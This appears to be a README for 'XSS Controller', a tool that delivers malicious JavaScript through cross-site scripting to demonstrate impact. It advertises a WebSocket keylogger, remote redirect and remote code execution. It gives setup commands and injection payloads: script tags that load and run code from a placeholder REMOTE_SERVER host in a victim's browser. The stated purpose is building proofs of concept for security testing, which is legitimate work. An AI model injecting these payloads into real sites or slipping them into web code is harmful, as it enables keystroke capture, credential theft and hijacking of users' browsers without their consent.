XSS Controller is a framework to deliver malicious javascript inside XSS payloads and make better PoC to demonstrate the impact of successful XSS exploration.
- KeyLogger via WebSocket
- Remote redirect
- Remote JavaScript Execution
./setup.sh
npm i
npm start
Inject XSS payload to invoke remote javascript.
<script src="https://REMOTE_SERVER:8443/"></script>
<script src="http://REMOTE_SERVER:8080/"></script>
By default the server is up in 8080 port to HTTP Server and 8443 to HTTPS.
This config can be changed in /app/server.js
in config variable.
// Config ports to listen on
const config = {
HTTPS_PORT: 8443,
HTTP_PORT: 8080,
WEB_SOCKET_PORT: 3000,
};
npm i
npm start
This project was created based on xss-keylogger by hadynz.